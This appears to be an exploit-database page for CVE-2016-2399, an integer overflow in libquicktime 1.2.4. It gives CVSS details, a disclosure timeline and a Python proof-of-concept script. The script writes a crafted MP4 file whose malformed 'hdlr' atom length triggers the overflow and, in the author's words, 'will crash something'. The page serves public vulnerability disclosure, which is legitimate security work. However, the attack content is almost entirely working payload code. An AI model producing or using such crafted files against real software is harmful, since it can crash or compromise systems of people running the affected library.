Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
libquicktime 1.2.4 Integer Overflow
2016.02.24
Credit:
Marco Romano
Risk:
Medium
Local:
No
Remote:
Yes
CVE:
CVE-2016-2399
CWE:
CWE-189
Ogólna skala CVSS:
6.8/10
Znaczenie:
6.4/10
Łatwość wykorzystania:
8.6/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Średnia
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Częściowy
Wpływ na integralność:
Częściowy
Wpływ na dostępność:
Częściowy
#!/usr/bin/env python # ### # - 7 February 2016 - # My last bug hunting session (*for fun and no-profit*) # has been dedicated to libquicktime ### # # Author: Marco Romano - @nemux_ http://www.nemux.org # libquicktime 1.2.4 Integer Overflow # # Product Page: http://libquicktime.sourceforge.net/ # Description: 'hdlr', 'stsd', 'ftab' MP4 Atoms Integer Overflow # Affected products: All products using libquicktime version <= 1.2.4 # # CVE-ID: CVE-2016-2399 # # Disclosure part: http://www.nemux.org # ######## ####### Timeline # # 07 Feb 2016 Bug discovered # 17 Feb 2016 Mitre.org contacted # 17 Feb 2016 Disclosed to the project's maintainer # 23 Feb 2016 No response from the maintainer # 23 Feb 2016 Publicly disclosed # ######## ####### References # # https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2399 # http://libquicktime.sourceforge.net/ # http://www.linuxfromscratch.org/blfs/view/svn/multimedia/libquicktime.html # https://en.wikipedia.org/wiki/QuickTime\_File\_Format # ####### # # DISCLAIMER: It's just a PoC... it will crash something # #### import sys import struct import binascii """ There needs to be an mp4 file with these nested atoms to trigger the bug: moov -> trak -> mdia -> hdlr """ hax0r_mp4 = ("0000001C667479704141414100000300336770346D70343133677036000000086D646174000001B1" "6D6F6F76" #### moov atom "0000006C6D76686400000000CC1E6D6ECC1E6D6E000003E80000030200010000010000000000000000000000" "000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000000" "00000000000000000000000000000003000000FD756474610000001263707274000000000000FEFF0000000000126175" "7468000000000000FEFF0000000000127469746C000000000000FEFF00000000001264736370000000000000FEFF0000" "0000001270657266000000000000FEFF000000000012676E7265000000000000FEFF00000000001A72746E6700000000" "00000000000000000000FEFF000000000018636C7366000000000000000000000000FEFF00000000000F6B7977640000" "000055C400000000276C6F6369000000000000FEFF000000000000000000000000000000FEFF0000FEFF0000000000FF" "616C626D000000000000FEFF0000010000000E79727263000000000000000002E4" "7472616B" #### trak atom "0000005C746B686400000001CC1E6D6ECC1E6D6E00000001000000000000030000000000000000000000000001000000" "000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000040" "6D646961" #### mdia atom "000000206D64686400000000CC1E6D6ECC1E6D6E00003E800000300000000000000000" "4E" #### hdlr atom length "68646C72" #### hdlr atom "0000000000" "4141414141414141" #### our airstrip :) "0000000000000000000000" "EC" #### 236 > 127 <-- overflow here and a change in signedness too "616161000000FF736F756E000000000000000000000000536F756E6448616E646C6572000000012B6D696E6600000010") hax0r_mp4 = bytearray(binascii.unhexlify(hax0r_mp4)) def createPoC(): try: with open("./nemux.mp4","wb") as output: output.write(hax0r_mp4) print "[*] The PoC is done!" except Exception,e: print str(e) print "[*] mmmm!" def usage(): print "\nUsage? Run it -> " + sys.argv[0] print "this poc creates an mp4 file named nemux.mp4" print "--------------------------------------------" print "This dummy help? " + sys.argv[0] + " help\n" sys.exit() if __name__ == "__main__": try: if len(sys.argv) == 2: usage() else: print "\nlibquicktime <= 1.2.4 Integer Overflow CVE-2016-2399\n" print "Author: Marco Romano - @nemux_ - http://www.nemux.org\n\n"; createPoC(); except Exception,e: print str(e) print "Ok... Something went wrong..." sys.exit()
Referencje:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2399
http://libquicktime.sourceforge.net/
http://www.linuxfromscratch.org/blfs/view/svn/multimedia/libquicktime.html
https://en.wikipedia.org/wiki/QuickTime_File_Format
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top